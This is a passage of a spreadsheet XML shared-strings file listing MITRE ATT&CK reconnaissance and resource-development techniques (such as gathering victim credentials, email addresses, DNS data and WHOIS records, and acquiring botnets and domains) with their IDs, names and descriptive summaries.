    <t>Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information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[Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Credentials</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). </t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Email Addresses</t>
  </si>
  <si>
    <t>Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.
Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Employee Names</t>
  </si>
  <si>
    <t>Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>T1590.002</t>
  </si>
  <si>
    <t>Gather Victim Network Information: DNS</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1590.001</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Domain Properties</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1590.005</t>
  </si>
  <si>
    <t>Gather Victim Network Information: IP Addresses</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1590.006</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Security Appliances</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1590.004</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Topology</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1590.003</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Trust Dependencies</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>T1591.002</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Business Relationships</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>T1591.001</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Determine Physical Locations</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>T1591.003</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Identify Business Tempo</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))</t>
  </si>
  <si>
    <t>T1591.004</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Identify Roles</t>
  </si>
  <si>
    <t>Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1598.004</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Voice</t>
  </si>
  <si>
    <t>Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
All forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or "vishing"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)
Victims may also receive phishing messages that direct them to call a phone number ("callback phishing") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)
Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.</t>
  </si>
  <si>
    <t>T1597.002</t>
  </si>
  <si>
    <t>Search Closed Sources: Purchase Technical Data</t>
  </si>
  <si>
    <t>Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>T1597.001</t>
  </si>
  <si>
    <t>Search Closed Sources: Threat Intel Vendors</t>
  </si>
  <si>
    <t>Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1596.004</t>
  </si>
  <si>
    <t>Search Open Technical Databases: CDNs</t>
  </si>
  <si>
    <t>Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>Search Open Technical Databases: DNS/Passive DNS</t>
  </si>
  <si>
    <t>Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>T1596.003</t>
  </si>
  <si>
    <t>Search Open Technical Databases: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>T1596.005</t>
  </si>
  <si>
    <t>Search Open Technical Databases: Scan Databases</t>
  </si>
  <si>
    <t>Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>T1596.002</t>
  </si>
  <si>
    <t>Search Open Technical Databases: WHOIS</t>
  </si>
  <si>
    <t>Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>T1593.003</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Code Repositories</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.  
Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). 
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories. </t>
  </si>
  <si>
    <t>T1593.002</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Search Engines</t>
  </si>
  <si>
    <t>Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1593.001</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Social Media</t>
  </si>
  <si>
    <t>Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>T1583.005</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)</t>
  </si>
  <si>
    <t>T1583.002</t>
  </si>
  <si>
    <t>Acquire Infrastructure: DNS Server</t>
  </si>
  <si>
    <t>Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Domains</t>
  </si>
  <si>
    <t>Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
